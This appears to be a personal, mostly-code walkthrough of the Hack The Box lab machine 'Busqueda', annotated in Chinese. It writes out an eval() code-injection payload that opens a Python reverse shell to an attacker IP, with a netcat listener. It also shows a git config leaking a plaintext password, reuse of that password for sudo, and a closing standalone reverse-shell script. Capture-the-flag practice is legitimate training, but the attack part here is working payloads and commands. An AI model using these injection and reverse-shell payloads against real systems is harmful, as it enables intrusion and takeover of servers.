Busqueda — Hack The Box Machine

sudo openvpn lab_Wreath0690.ovpn

10.10.11.208

# 初始端口扫描
nmap -A 10.10.11.208

# 系统——Ubuntu

# 易受攻击的代码包括 eval() 方法：
url = eval(
            f"Engine.{engine}.search('{query}', copy_url={copy}, open_web={open})"
        )
        
        

', exec("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ATTACKER_IP',PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);"))#

engine=Ask&query=', exec("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.16.8',4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);"))#

# 另一个命令行窗口
nc -lvvp 4444

$ cd /var/www/app
$ pwd
/var/www/app
$ ls
app.py
templates
$ ls -la
total 20
drwxr-xr-x 4 www-data www-data 4096 Apr  3 14:32 .
drwxr-xr-x 4 root     root     4096 Apr  4 16:02 ..
-rw-r--r-- 1 www-data www-data 1124 Dec  1 14:22 app.py
drwxr-xr-x 8 www-data www-data 4096 May 15 21:06 .git
drwxr-xr-x 2 www-data www-data 4096 Dec  1 14:35 templates
$ cd .git
$ ls -la
total 52
drwxr-xr-x 8 www-data www-data 4096 May 15 21:06 .
drwxr-xr-x 4 www-data www-data 4096 Apr  3 14:32 ..
drwxr-xr-x 2 www-data www-data 4096 Dec  1 14:35 branches
-rw-r--r-- 1 www-data www-data   15 Dec  1 14:35 COMMIT_EDITMSG
-rw-r--r-- 1 www-data www-data  294 Dec  1 14:35 config
-rw-r--r-- 1 www-data www-data   73 Dec  1 14:35 description
-rw-r--r-- 1 www-data www-data   21 Dec  1 14:35 HEAD
drwxr-xr-x 2 www-data www-data 4096 Dec  1 14:35 hooks
-rw-r--r-- 1 root     root      259 Apr  3 15:09 index
drwxr-xr-x 2 www-data www-data 4096 Dec  1 14:35 info
drwxr-xr-x 3 www-data www-data 4096 Dec  1 14:35 logs
drwxr-xr-x 9 www-data www-data 4096 Dec  1 14:35 objects
drwxr-xr-x 5 www-data www-data 4096 Dec  1 14:35 refs
$ cat config
[core]
        repositoryformatversion = 0
        filemode = true
        bare = false
        logallrefupdates = true
[remote "origin"]
        url = http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git
        fetch = +refs/heads/*:refs/remotes/origin/*
[branch "main"]
        remote = origin
        merge = refs/heads/main
$ 

svc$ sudo -S -l
> [sudo] password for svc: jh1usoih2bkjaspwe92
> ... snip ...
>
> User svc may run the following commands on busqueda:
>     (root) /usr/bin/python3 /opt/scripts/system-checkup.py *

svc$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py /etc/passwd
> Usage: /opt/scripts/system-checkup.py <action> (arg1) (arg2)
>
>      docker-ps     : List running docker containers
>      docker-inspect : Inpect a certain docker container
>      full-checkup  : Run a full system checkup

# 用户 svc 在 busqueda 上具有特权执行脚本 system-checkup.py 的能力

# 用户 svc 试图使用 sudo 执行 /usr/bin/python3 /opt/scripts/system-checkup.py /etc/passwd 命令，其中 /etc/passwd 被作为参数传递给 system-checkup.py 脚本

# 脚本的用法提示
system-checkup.py 脚本支持以下动作选项：
docker-ps：列出正在运行的 Docker 容器。
docker-inspect：检查特定的 Docker 容器。
full-checkup：运行完整的系统检查。

#!/usr/bin/python3
import socket
import subprocess
import os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.16.8",4441))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
import pty
pty.spawn("sh")